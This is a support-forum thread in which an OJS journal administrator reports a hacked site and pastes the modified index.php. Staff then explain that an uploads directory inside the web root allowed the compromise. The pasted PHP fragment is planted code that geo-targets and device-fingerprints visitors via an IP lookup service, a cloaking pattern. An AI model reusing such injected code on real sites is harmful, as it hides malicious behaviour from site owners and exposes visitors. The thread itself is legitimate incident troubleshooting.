Site attacked - some files were modified such as index.php

Describe the issue or problem
It seems that our website has been attacked. The main page is frozen. The site is: ttps://journals.moleculepub.com/

We checked file in the file manager and found that several files were updated. In particular the index.php was modified. Here is the file:

<?php session_start(); // Mendeteksi perangkat pengguna (mobile atau desktop) dan negara asal function isMobileDeviceFromIndonesiaOrUS() { $ip = $_SERVER['REMOTE_ADDR']; // Cek apakah hasilnya sudah ada di sesi if (isset($_SESSION['ip_info'][$ip])) { $ip_info = $_SESSION['ip_info'][$ip]; } else { // Mendapatkan info IP dari API $ip_info = json_decode(file_get_contents("http://ip-api.com/json/$ip")); // Simpan hasilnya dalam sesi if ($ip_info) { $_SESSION['ip_info'][$ip] = $ip_info; } } // Cek juga apakah alamat IP adalah alamat VPN $vpn_ip_ranges = array( '1.0.0.0/24', '2.0.0.0/16', // Tambahkan alamat IP VPN lain jika diperlukan ); foreach ($vpn_ip_ranges as $vpn_ip_range) { if (ip_in_range($ip, $vpn_ip_range)) { return false; // Jika pengguna menggunakan VPN } } // Jika alamat IP berasal dari Indonesia atau Amerika Serikat if ($ip_info && ($ip_info->countryCode === 'ID' || $ip_info->countryCode === 'US')) { // Jika dari Indonesia, periksa apakah perangkat mobile if ($ip_info->countryCode === 'ID') { return preg_match('/(android|iphone|ipod|ipad|iemobile|opera mini)/i', $_SERVER['HTTP_USER_AGENT']); } // Jika dari Amerika, izinkan akses tanpa batasan return true; } return false; // Untuk negara lain } // Fungsi untuk memeriksa apakah alamat IP ada dalam suatu rentang IP function ip_in_range($ip, $range) { list($subnet, $mask) = explode('/', $range); return (ip2long($ip) & ~((1 <

The webpage now is frozen. Has anyone had a similar experience? Any solutions?

Steps I took leading up to the issue
I tried to change the index.php file by deleting the codes above and using the following code, but it did not work:

<?php /** * @file ojs/index.php * * Copyright (c) 2014-2021 Simon Fraser University * Copyright (c) 2003-2021 John Willinsky * Distributed under the GNU GPL v3. For full terms see the file docs/COPYING. * * Bootstrap code for OJS site. Loads required files and then calls the * dispatcher to delegate to the appropriate request handler. */ use APP\core\Application; // Initialize global environment define('INDEX_FILE_LOCATION', __FILE__); require_once './lib/pkp/includes/bootstrap.php'; // Serve the request Application::get()->execute(); **What application are you using?** OJS 3.4 **Additional information** These are the files that seem to be modified by the attack ![Untitled|690x337](upload://er6RaTXiBiDdbIwxdfsmKCz5IcA.jpeg)

Hi @mazenhammadi,

Was your files directory (files_dir in config.inc.php) inside the web root?

If it was, that’s a dangerous configuration, and likely the way you got hacked.

Regards,
Alec Smecher
Public Knowledge Project Team

Hello @asmecher . Thank you for your reply. I am not sure, I normally access config.inc.php in the file manager. Any suggestions?

Hi @mazenhammadi,

What is the files_dir setting in your configuration file?

Regards,
Alec Smecher
Public Knowledge Project Team

Hi @asmecher

Here is the files_dir setting in your configuration file:

[files]

; Complete path to directory to store uploaded files
; (This directory should not be directly web-accessible)
; Windows users should use forward slashes
files_dir = /home4/molecup9/public_html/journals/files

; Path to the directory to store public uploaded files
; (This directory should be web-accessible and the specified path
; should be relative to the base OJS directory)
; Windows users should use forward slashes
public_files_dir = public

Hi @mazenhammadi,

This is what I suspected. Because you’ve placed the files directory inside public_html, its contents are directly accessible through the web server, bypassing OJS’s security. This makes your server easy to hack. There’s a warning about this in the configuration file, and on the installation form.

Regards,
Alec Smecher
Public Knowledge Project Team

Could you send more details about this please and how to increase the security of the website? I believe I need an IT expert to solve the problem

Please see:
https://docs.pkp.sfu.ca/admin-guide/en/securing-your-system

For example, you could move from:

files_dir = /home4/molecup9/public_html/journals/files

To:
/home4/molecup9/jounals_files

In addition to adjusting this setting, you need to move the folder and ensure that it is in the backup routine.

1 Like

@abadan Thank you for your suggestion. Just to clarify. So I can keep the folder of the journals where it is now: /home4/molecup9/public_html/journals. And just move the files folder to another place outside the public_html? Is that right?

That’s right, only “files” need to be moved out.

This topic was automatically closed after 10 days. New replies are no longer allowed.